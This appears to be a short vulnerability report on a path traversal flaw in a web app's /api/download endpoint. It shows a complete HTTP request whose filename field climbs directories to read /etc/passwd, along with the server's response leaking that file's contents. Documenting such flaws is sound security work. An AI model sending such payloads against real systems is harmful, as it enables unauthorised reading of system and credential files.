Path Traversal
Path Traversal allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.
Within the storage area, it is possible to upload files that are stored on the local file system, this can then be fetched using the Download feature.
This HTTP request can be manipulated to read arbitrary files from the system.
POST /api/download HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjI3NzcxODYyLCJleHAiOjE2Mjc5NDQ2NjIsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.CnNr3tJzn3yBG7RFoSJ_fy8eMbq634BXeSXYzHhAyVE
Content-Length: 49
Origin: http://target.local
Connection: close
Referer: http://target.local/upload.html
{"filename":"../../../../../../../../etc/passwd"}
TTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: http://target.local
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Disposition: attachment; filename="passwd"
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 01 Jun 2021 10:32:04 GMT
ETag: W/"b12-179c7216463"
Content-Type: application/octet-stream
Content-Length: 2834
Date: Sat, 31 Jul 2021 23:00:49 GMT
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
....